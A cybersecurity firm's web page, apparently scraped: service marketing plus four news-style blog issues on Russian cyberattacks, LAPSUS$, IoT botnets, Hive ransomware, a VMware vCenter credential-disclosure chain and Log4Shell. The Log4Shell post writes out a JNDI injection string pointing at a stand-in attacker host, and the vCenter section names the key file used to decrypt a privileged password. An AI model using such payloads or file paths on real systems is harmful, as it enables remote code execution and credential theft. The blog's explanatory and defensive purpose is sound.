Empowering Clients to the next level of Cybersecurity

A Cybersecurity Partner You Can Trust

We are strategists, engineers, analysts, and governance experts embedded in the world’s biggest cyber missions and trusted to advance them.

Our high standards in servicing clients are exemplified through information security, quality and IT service management certifications, both at individual and organisational levels.
Our Services
Managed Detection & Response

CyBourn’s Managed Detection and Response Service maintains seamless integration with our clients’ IT infrastructure and processes. We deliver optimum levels of hardware and software integration, enabling analysts to rapidly detect threats. Our incident handling process ensures that threat mitigation activity commences immediately following identification.

Managed Detection & Response
Our Services
Penetration Testing

Penetration Testing is a method for gaining assurance in the security of an IT system by attempting to breach some or all of that system’s security, using the same tools and techniques as an adversary might. Penetration testing should be viewed as a method for gaining assurance in your organisation’s vulnerability assessment and management processes, not as a primary method for identifying vulnerabilities.

pen-testing
Our Services
Incident Response

Our incident response methodology is designed to provide a common framework for our incident responders to work and interact as part of the SOC ecosystem in order to react quickly and effectively to identified threats within infrastructure while coordinating their actions with monitoring and detection teams as well as other incident responders.

incident-response
Our Services
Threat Hunting

Our threat hunting methodology is designed to provide a common framework for our threat hunters to work and interact as part of the SOC ecosystem in order to provide targeted threat detection and effective, continuous improvement to our automated detection and response capabilities.

threat-hunting
Our Services
Cybersecurity Awareness Training

CyBourn builds and executes complex social engineering scenarios to test awareness levels of internal staff. As the number one entry point for data breaches, phishing techniques are very hard to mitigate. The best solution to cope with such threats is maintaining high levels of awareness.

cyber-awareness

Secure your remote workforce

Implementing effective cybersecurity measures is particularly challenging today because there are more devices than people, attackers are becoming more innovative, and we are facing the fact that there will forever be more remote workers in the new post-pandemic world.

The latest cyber-offensive intelligence to identify and address security risks

Defending against cyber threats requires an in-depth understanding of how attackers operate. Our extensive experience of conducting pen testing, red teaming and other ethical hacking engagements around the world means we have first-hand knowledge of the latest adversarial tactics and wide-ranging insight into how to safeguard against them.

Incorporating your tools 

CyBourn delivers ultramodern solutions in consultation with our clients’ IT and risk departments enabling a high degree of scalability and customisation. We can utilise existing client tools, or act as security integrators to recommend and implement open-source, commercial, or off-the-shelf products.

CyBourn takes a unique bespoke approach to developing cybersecurity solutions

We deploy SOAR (Security Orchestration, Automation, and Response) solution stack to ensure deep visibility, continuous analysis, and rapid response. If an existing product or solution does not offer the needed level of visibility for you, CyBourn can build custom tools to collect relevant data.

CyBourn leverages bespoke ML algorithms.

CyBourn leverages machine learning algorithms to build network and user behavioural patterns, detect anomalies accurately, perform in-depth investigations, and act swiftly to contain potential threats, enhance proactive analysis, and map behaviour.

Drive decisions through powerful data

Integrate your essential data and information security indicators to empower your data driven decision making and response capabilities with EtherLast.

We offer global coverage

Enabled by our global R&D and continuous internal development process, we cover the entire cybersecurity landscape for enterprises across industries, sectors and geographies.

End-to-end solutions

We live the policies, architectures, and intelligence that define cyber enterprises and operations. Our experts have significant experience in offering state-of-the-art monitoring solutions, best in class incident response services, and tailored strategic cybersecurity consulting.

Secure your remote workforce

Implementing effective cybersecurity measures is particularly challenging today because there are more devices than people, attackers are becoming more innovative, and we are facing the fact that there will forever be more remote workers in the new post-pandemic world.

The latest cyber-offensive intelligence to identify and address security risks

Defending against cyber threats requires an in-depth understanding of how attackers operate. Our extensive experience of conducting pen testing, red teaming and other ethical hacking engagements around the world means we have first-hand knowledge of the latest adversarial tactics and wide-ranging insight into how to safeguard against them.

Incorporating your tools 

CyBourn delivers ultramodern solutions in consultation with our clients’ IT and risk departments enabling a high degree of scalability and customisation. We can utilise existing client tools, or act as security integrators to recommend and implement open-source, commercial, or off-the-shelf products.

CyBourn takes a unique bespoke approach to developing cybersecurity solutions

We deploy SOAR (Security Orchestration, Automation, and Response) solution stack to ensure deep visibility, continuous analysis, and rapid response. If an existing product or solution does not offer the needed level of visibility for you, CyBourn can build custom tools to collect relevant data.

CyBourn leverages bespoke ML algorithms.

CyBourn leverages machine learning algorithms to build network and user behavioural patterns, detect anomalies accurately, perform in-depth investigations, and act swiftly to contain potential threats, enhance proactive analysis, and map behaviour.

Drive decisions through powerful data

Integrate your essential data and information security indicators to empower your data driven decision making and response capabilities with EtherLast.

We offer global coverage

Enabled by our global R&D and continuous internal development process, we cover the entire cybersecurity landscape for enterprises across industries, sectors and geographies.

End-to-end solutions

We live the policies, architectures, and intelligence that define cyber enterprises and operations. Our experts have significant experience in offering state-of-the-art monitoring solutions, best in class incident response services, and tailored strategic cybersecurity consulting.

UI3C
UI3C
What’s trending at CyBourn
The Cybersecurity Express – April 1st 2022
Blog | 1 APR, 2022
The Cybersecurity Express – April 1st 2022
A crazy place to be in right now, the 2022 cyberspace, with so much cyber activity happening, it’s hard not to be anxious and excited at the same time. Although at times alarming , CyBourn’s Cybersecurity Express is here to help you visit these emerging threats from the comfort of you seat. But remember, if you are alive in these modern times then you are exposed (unless you are some sort of a virtual Bear Grills and chose to live a life off-grid), and you are swimming in open waters where the sharks are always lurking… So, get your scuba gear ready, because we are about to dive into the cybersecurity abyss: Russia’s War has an intensifying cyber-front and imminently will target the USA and its allied countries, the US intelligence community openly warns. Please make sure to secure your air tanks while we take a look on at the cyber-criminal group LAPSUS$ and their latest hacks. Keep your fins inside while the train is moving past critical information disclosure vulnerability found in VMware vCenter. “Russian Cyber-attacks will Continue”                 It is a sad truth that Russian attacks against Ukraine are continuing, both physical and cybernetic, but the latter seems to be a gray area. Confined by the fact that the world is uniting to help Ukraine, and because of the sanctions, Russia is exploring options for cyber-attacks to weaken allied forces, so warns US intelligence. So far, due to their intangible and (partially) anonymous nature, cyber-attacks are yet to be considered “an act of war”, and can be used without many repercussions, but that really depends on the interpretation of the victim state. Russian state intelligence agencies and/ or related criminal gangs could be used to target US Government Departments and Agencies, hospitals, critical infrastructure, and utilities. President Biden and CISA first warned the private sector, which owns much of America’s critical infrastructure and hasn’t always heeded government warnings, to immediately harden its online defenses, warnings that we covered in a previous Cybersecurity Express. “The magnitude of Russia’s cyber capacity is fairly consequential, and it’s coming,” the President warned. “He hasn’t used it yet, but it’s part of his playbook,” Biden said of Putin. Cyber-attacks may be Putin’s only way to “punish” the west for the crippling sanctions and for the anti-tank and anti-aircraft weapons sent to Ukraine, all this are backed by the fact that Russia has a history in cyber-warfare .                 Although the president stated that the US will retaliate severely to any such attacks on US Government infrastructure and on US medical, utility and supply infrastructure – what can the private sector do to stay safe? The same good measures as always apply here and are the best and cheapest way to deter any Russian or other state coordinated attacks and that goes with any cyber-attacks in general:  Sensitive Information Disclosure in VMware vCenter                 Although not yet given a CVSS (at the time of writing), CVE-2022-22948 is a critical vulnerability due to the global scale usage, where it’s estimated that 80% of virtualized environments are running VMware technology. This vulnerability is part of a critical kill chain that leads to an ESXi takeover, complete with virtual machines, from just endpoint access to a host with a vCenter client. Researchers published these finding alongside the PoC (proof of concept), and it’s a lengthy process, involving multiple steps and multiple vulnerabilities. To summarize it, first they gain shell access to an instance of VMware vCenter by exploiting CVE-2021-21972 , using the basic user rights to gain access to postgresDB, where they can query extensive information about ESXi and vCenter, and also the contents of the ‘vpx_host’ table which contains the details for a user called ‘vpxuser’ and its password phrase. The “ vpxuser ” user is created on the ESXi by default and it’s highly privileged so it can manage the vCenter without the use of root, as stated by its passwd description: “ VMware VirtualCenter administration account ”. With a little bit of digging around, you can find all the information needed to be able to decrypt the password. Well, almost all of the information because you need a privilege escalation technique to be able to read the “ /etc/vmware-vpx/ssl/symkey.dat ” information, but “luckily” there is an privilege escalation vulnerability for that as well.                 To keep safe from CVE-2022-22948, be sure to apply the patches on VMware’s Advisory site.  There is no known workaround, so make sure to crank up those updates. The Cybercriminal Group LAPSUS$                 Of all the cyberattacks taking place lately and all the criminal groups involved, few stand out like Lapsus$. They are a relatively new cybercrime group that specializes in stealing data from big companies and threatening to publish it unless a ransom is paid, with the bulk of the group’s victims (15 of them) have been in Latin America and Portugal. “Little is known of the origins of the group, however, given that Lapsus$’s initial activity was directed towards several organizations in Brazil, some researchers have speculated that the group is based in South America,” researchers say. They have risen to “fame” quicky after successfully breaching companies like Nvidia, Microsoft, Okta and Globant. Microsoft on Tuesday confirmed that the Lapsus$ extortion-focused hacking crew had gained “limited access” to its systems, as authentication services provider Okta revealed that nearly 2.5% of its customers have been potentially impacted in the wake of the breach. Globant also confirmed a breach after Lapsus$ leaks 70GB of their data, and so did Nvidia and Okta. The companies have stated that the information exfiltrated is not of major importance and have contacted the victims to mitigate the outcome. It makes your skin crawl to think where they are already infiltrated by now, waiting to leak the data, and we don’t even know it.                 That’s it for this edition of CyBourn’s Cybersecurity Express. Hope you enjoyed the ride, and we await your return for the next journey. We know the subjects presented here can be scary, but it’s much better to be aware and educated, that we begin to prepare our defenses, that we are prepared to respond and fight back!
The Cybersecurity Express – Issue #6
Blog | 11 MAR, 2022
The Cybersecurity Express – Issue #6
You hear the Cybersecurity Express approaching as you near the platform. Everything seems to be in order and on schedule, but you notice one key difference: the colors of the train, blue and yellow. Reality soon settles in as you face an undeniable truth:  There is no denying this, we are all impacted and sooner or later we will have to face the music. The train will take you through the cybernetic battlefront as we need to see firsthand the implications and take the necessary approach in order to properly defend your organization. From the comfort of your seat, you will see history being written and how the stance between cyber-criminals and cybersecurity specialists is changing from here onward.                 It was inevitable not to talk about the grotesque Russian invasion of Ukraine, the implications of it all and how real-life conflict is bleeding into the digital realm. It’s chaos: Russia is attacking on all fronts, the world is united by circumstance against a common foe, bad actors are now switching to fight for the good cause and other groups are just taking advantage of the mess, playing their cards on both sides to maximize personal gains. Revelations of the Past                 This whole mess started back in 2014 when Pro-Russian Hacktivist Group – CyberBerkut was hired to disrupt/manipulate the 2014 Ukrainian presidential elections, where they employed a combination of malware, file deletion and DDoS tactics, but were ultimately not successful, resulting in a pro-western party being elected. This was followed with the first known successful cyber-attack against a power grid compromising systems of three energy distribution companies. On the eve of Ukraine Constitution Day in 2017, we were presented with one of the “most devastating cyber-attacks in history”: NotPetya wiper malware. Targeting both public and private sector entities, the attack was highly disruptive in nature as it disabled computers by wiping hard drives and spread independently to companies that used a popular tax-filing software (M.E.Doc). The malware was not designed to be decrypted; money was not what the perpetrators were after. A New Face of War                 In the beginning of 2022, we started seeing wiper attacks, that we are all familiar with now, the first of which being “WhisperGate”, discovered by Microsoft, that disrupted government, non-profit, and information technology organizations, followed by the more recent “HermeticWiper” that affected hundreds of computers, this time including Latvia and Lithuania as targets, with “IsaacWiper” being the latest of this kind. In the meantime, defacement of government and public institution websites took place with political imagery, presenting the message “Prepare for the worst” and the biggest DDoS attack Ukraine has ever witnessed, brought down websites of several Ukrainian banks and government departments, including the Ministry of Foreign Affairs, Ministry of Defense and Ministry of Internal Affairs among others. All of these coupled with misinformation/ disinformation being spread to the masses with unprecedented ease due to the online nature of today’s world, where the real war is fought on social media platforms like YouTube, Facebook, Instagram WhatsApp, Telegram and TikTok between the lies and the truth. These media networks have turned out to be a double-edged sword for the oppressors as not only being used by them to spread misinformation to the Russian people and to the world, but also against them, being the only way for the truth to get in. On the other flank, we see the world uniting and collaborating like never before, fighting back, doubling down on the oppressor, giving them a taste of their own medicine. Even some malicious cyber-groups have joined the just cause, for now, fighting for freedom and righteousness, united against a common foe. The Future is Being Decided As we saw in the tactics used so far, wipers masked as ransomware, DDoS disruptions and misinformation seem to be the weapon of choice, and they are being done in sneaky ways, at scales never seen before. This was something that the Cybersecurity and Infrastructure Security Agency (CISA) has foreseen and together with the FBI and the NSA released a joint Cybersecurity Advisory (CSA) providing an overview of Russian state-sponsored cyber operations, including commonly observed tactics, techniques, and procedures, and have been posting recommendations regularly.   Cloudflare announced they will keep providing its services to Ukraine, Belarus and Russia, however with certain security measures in place. They side with Ukraine and are willing to comply with all the requirements from the imposed sanctions against Russia, also taking drastic measures as bricking the servers, should they go online. The firm argued that services should be kept operational within Russia as the internet is the only source that the people can get reliable information from. DDoS attacks are becoming more common and more potent than ever before through new and clever ways. Researchers uncovered new reflection/ amplification DDoS methods that provide a record-breaking amplification ratio of almost 4.3 billion to 1. Reflection attacks start with a small packet reflected inside a closed network while its size gets amplified with each loop. When reaching the possible upper limit, the resulting volume of traffic is channeled to the target. For this DDoS method, threat actors are abusing vulnerable Mitel devices, such as MiVoice Business Express and MiCollab or by leveraging the functionality of Middleboxes . One notable difference of these vectors against most UDP reflection methodologies is that they can sustain lengthy DDoS attacks, lasting for up to 14 hours. “The single largest observed attack of this type to date was approximately 53 million pps and 23 gb/sec. The threat actors need a way in, and most of the time the weakest link for compromising a network remains human. Google has issued a warning of an increase in phishing campaign conducted by government-backed groups. The purpose of this will be to sweep the nations, especially eastern EU countries, for vulnerable spots in order to compromise networks for future attacks. Threat actor groups such as Belarusian Ghostwriter and Russian FancyBear launched, in the past several days, credential phishing campaigns using compromised email accounts targeting Polish and Ukrainian military and government organizations. An Awakening Out of all the unknowns, one thing is certain: We are seeing an increase in digital oppression and new, cunning ways to abuse the system, in a manner from which we may never go back. The good in all of this it that the world is starting to notice how vulnerable the digital medium is and how easily the harm reflected into the physical world is real. The masses are having an awakening to the importance of the service that cybersecurity companies provide. Among them CyBourn , standing with the oppressed, against the oppressors! An awakening to the ever-increasing need for the protection they provide against evolving actors, that have proven time and time again that we are as vulnerable in the here as we are out there.
The Cybersecurity Express – issue #5
Blog | 21 FEB, 2022
The Cybersecurity Express – issue #5
Good day and welcome aboard the Cybersecurity Express for another information packed adventure to the corners of the malicious underground to satisfy your appetite for shady tech news. On today’s ride, we will visit the past and see how a forgotten botnet malware is being brought back to life, a ransomware’s software flaw being used to decrypt its very own encrypted files, and lastly, because you’ve been good the past year, CISA put together a present, just for you. IoT Still Haunted by the Ghost of Mirai In this day and age, considering how rapidly software and computing evolve, 6 years is a really, really long time. So, it’s safe to assume that you may be too young to know about the Mirai malware, that harvested the power of about 100.000 IoT devices running Linux (like the smart TV in your living room, or your wi-fi enabled light bulb) to almost bring down the entirety of the US internet in October 2016. The targets were the DNS servers of Dyn, a company that controls much of the Internet’s domain name system infrastructure. This attack was of an unprecedented scale for its time, managing to bring down web giants such as Twitter, the Guardian, Netflix, Reddit, CNN, among others. Perhaps it was fate which made it so that the name chosen at the time was Mirai, which means “future” in Japanese, foreshadowing that the soul of this malware would, one day, come back to haunt us. Or maybe the researchers really understood that, although still in its infancy back then, the IoT would only multiply in the coming years, and that what they just have witnessed was only a taste of what the future had to offer. It just so happens that in 2020 and 2021 data revealed an increase in IoT device led attacks, and given the total number of IoT devices connected worldwide is projected to be about 30.9 billion devices by 2025 , this is a trend that we’ll only start hearing more of. The situation is only made worst by the security breaches suffered by compromised IoT manufacturers and the leaked confidential data being sold on the black market. Armed with this knowledge and having more targets to infect (the targets themselves only getting more powerful), it’s only a matter of time until something terrifying happens, the likes of which we have never seen before. With the power of research and technology, specialists at intel471 managed to pierce into the underworld, by analyzing data from compromised IoT devices (mainly in Europe and North America), and steal a glimpse of a specter, brought forth by the deployment of two kinds of botnet malware built on some familiar code bases, carrying out the echo of a long lost attack that once stumped the world: Gafgyt and Mirai. Just to name a few based on the latter: BotenaGo, Echobot, Loli, Moonet, Mozi and Zeroshell – which have been active since the start of the COVID-19 pandemic in early 2020 and have continued to evolve throughout 2021. And to put this in perspective, let’s name some of the vulnerabilities affecting IoT that have been disclosed lately: This leaves many possible options for both the attackers and the defenders. All is not lost, as such research is done for the sole purpose of understanding how the underground is leveraging the flaws in these devices and then deploy the correct defenses. Proactive measures can be taken to prevent damage, as such is the mission of cybersecurity services providers like CyBourn . Ransomware Encrypted Data, Decrypted by Researchers Just as the title suggests, researchers at South Korea Kookmin University have managed what they call “ first successful attempt ” at decrypting data infected with Hive ransomware “without the attacker’s private key, by using a cryptographic vulnerability identified through analysis”. First observed in June 2021, when it struck a company called Altus Group, Hive leverages a variety of tactics to infect their victims and as well as scare them, not just by encrypting the data but also exfiltrating sensitive data and threatening to post it publicly, in a tactic called double extorsion. Since then, they have victimized more than 355 companies. But now a glimmer of hope arises as the researchers claim that they were able to weaponize a flaw in the encryption algorithm to devise a method to reliably recover more than 95% of the keys employed during encryption. “For each file encryption process, two keystreams from the master key are needed,” the researchers explained. “Two keystreams are created by selecting two random offsets from the master key and extracting 0x100000 bytes (1MiB) and 0x400 bytes (1KiB) from the selected offset, respectively.” The encryption keystream, which is created from an XOR operation of the two keystreams, is then XORed with the data in alternate blocks to generate the encrypted file. But this technique also makes it possible to guess the keystreams and restore the master key, in turn enabling the decode of encrypted files without the attacker’s private key.             CISA Lists Free Security Tools and Services In an effort to help organizations fight off the malicious actors and reduce their cybersecurity risk, U.S. Cybersecurity and Infrastructure Security Agency (CISA) released repository of free tools and services , encompassing a mix of 101 “items” provided by CISA, open-source utilities and by private and public sector organizations across the cybersecurity community. “Many organizations, both public and private, are target rich and resource poor,” CISA Director, Jen Easterly, said in a statement. “The resources on this list will help such organizations improve their security posture, which is particularly critical in the current heightened threat environment.” This is not the first time CISA launces initiatives to help organizations maximize resilience by campaigning patching software security flaws, enforcing multi-factor authentication, and halting bad practices. Just in the recent past they gave us known exploited vulnerabilities, cybersecurity procedures, guidance for resisting ransomware infections as well as threats associated with nefarious information and influence operations , and just last week’s “ Shields Up ” campaign notifying organizations in the U.S. of potential risks arising from cyber threats that can disrupt access to essential services and potentially result in impacts to public safety. “Malicious actors may use tactics — such as misinformation, disinformation, and malinformation — to shape public opinion, undermine trust, and amplify division, which can lead to impacts to critical functions and services across multiple sectors,” CISA said.                 That’s a wrap for today’s Cybersecurity Express ride, and we thank you for being onboard. Be on the lookout for when we post the next itinerary, for we will want you back. Until then, stay safe!
The Cybersecurity Express – Issue #4
Blog | 17 DEC, 2021
The Cybersecurity Express – Issue #4
Cybourn’s very own Cybersecurity Express is once again leaving for fresh and exciting destinations. Hop aboard and journey through the latest news in cybersecurity. As usual, welcomed onboard and we are sure that you are eager to see what stops we will be making today. Everything seems to be in order, at first glance at the schedule. However, soon you start noticing something odd: most of the stops are closed for maintenance due to the same reason. How can it be that so many stations, so far apart, unrelated to each other, each serving its unique purpose, are all affected by the same faulty module? Can one module be so widely used?! Yes, and such is the case with this week’s spotlight program, Log4J! Log4J and the Log4Shell vulnerability. More like LogFromHell. If a couple of days ago, only a few knew about this module, now it’s the talk of the town. That is, if you haven’t been living under a rock. If you have though, don’t worry, the Cybersecurity Express will bring you up to speed, with a complete picture of the chaos from the past few days. Before we get into the mess of it all, let’s dig into a little bit of the background, shall we? Log4j2 is an open-source, Java-based logging framework commonly incorporated into Apache web servers and spring-Boot web applications, but also used to log events and messages generated by software applications, some of which you might have heard of. By few, we really mean an unimaginable number because we’re talking about: An extensive list on the known vulnerable applications is listed by the Dutch National Cyber Security Centre, in its GitHub repository , and believe me, it is quite a long scroll to get to the bottom. Signs of exploitation attempts and weaponization began to surface ten days before the vulnerability came to light, and since then, we have seen attackers exercising cryptocurrency miners, Cobalt Strike drops, ransomware, and botnet recruitment. “Earliest evidence we’ve found so far of Log4j exploit is 2021-12-01 04:36:50 UTC… However, we don’t see evidence of mass exploitation until after public disclosure.” researchers said. It is impossible to say for certain when this was first exploited, but the danger of JNDI lookups was mentioned in Blackhat talk all the way back in 2016, and somehow went under the radar, and, since the Apache Log4j 2.0-beta9 release was on September 21 2013, it is possible that a witty actor discovered this soon after. Dubbed Log4Shell, CVE-2021-44228 has a CVSS score of a “perfect” 10, and that’s as high as they go. That score is due to the widespread use of the program and the relative ease with which the exploit can be applied, allowing remote code execution in Log4j versions 2.0-beta9 up to 2.14.1. What makes this exploit so easy? JNDI (Java Naming and Directory Interface) and LDAP  can be used together by a Java program to locate a Java JNDIObject from an LDAP server operating on the same computer (localhost) on port 389 and reads attributes from it using the URL ldap:/localhost:389/o=JNDIObject. An attacker can control the LDAP URL by causing Log4j to try to write a string like ${jndi:ldap:/payload.com/a} resulting in a connection to payload.com and retrieve the object. And, because of how Log4j is built, all it takes to leverage the vulnerability is to send a specially crafted string containing the malicious code that gets logged by Log4j version 2.0 or higher. We used LDAP for this example but it can work with either LDAP, RMI or DNS. What are the attackers after? “The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers,” Microsoft 365 Defender Threat Intelligence Team said. “Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives.” A group of attackers managed to remote code execute (RCE) and download a .NET binary, from a remote server, that encrypts all the files with the extension “.khonsari” and displays a ransom note that urges the victims to make a Bitcoin payment in exchange for recovering access to the files. It’s hard to say what the end goal is here, and it is just as hard to compile a list of IOCs, because hackers are taking a spray-and-pray approach just to wreak havoc. “This vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string,” Security expert Marcus Hutchins tweetd . The overall scale of this is hard to grasp, but measures like the Cybersecurity and Infrastructure Security Agency (CISA) giving federal agencies an ultimatum to patch systems against the critical vulnerability, and the fact that Ingenuity (NASA’s helicopter mission on Mars) is susceptible to this exploit, kid of puts it in perspective. Oh, and by the way, this last-mentioned fact, makes this the first interplanetary exploit… probably. Despite that, researchers had been hard at work compiling list of checks, GitHub repositories, and tools you can use to see if you are vulnerable, apply workarounds to mitigate the attack or find traces of exploit. What can you do? If your organization uses the log4j library, upgrade to log4j-2.16.0  immediately. You should also be sure that your Java instance is updated. From Log4j 2.15.0 on, this behavior has been disabled by default. To make things worse, the release of the patched version, came with news of another vulnerability CVE-2021-45046 revealing that the module is also prone to a denial of service attack, which attackers are now also exploiting. Also, consult the Git repositories to see what helps, check the list of affected vendors and apply the latest patches particular to each software, should they be released. If, for any reason, you are unable to update, you could: As this ride onboard the Cybersecurity Express draws to an end, you feel relieved and now are better prepared to face Log4Shell exploit. This is indeed a subject worthy of the entire attention it’s getting. We bid you goodbye humbly await your return onboard. 

Tell us about your Cybersecurity needs

We are strategists, engineers, analysts, and governance experts embedded in the world’s biggest cyber missions and trusted to advance them. Let us help you today.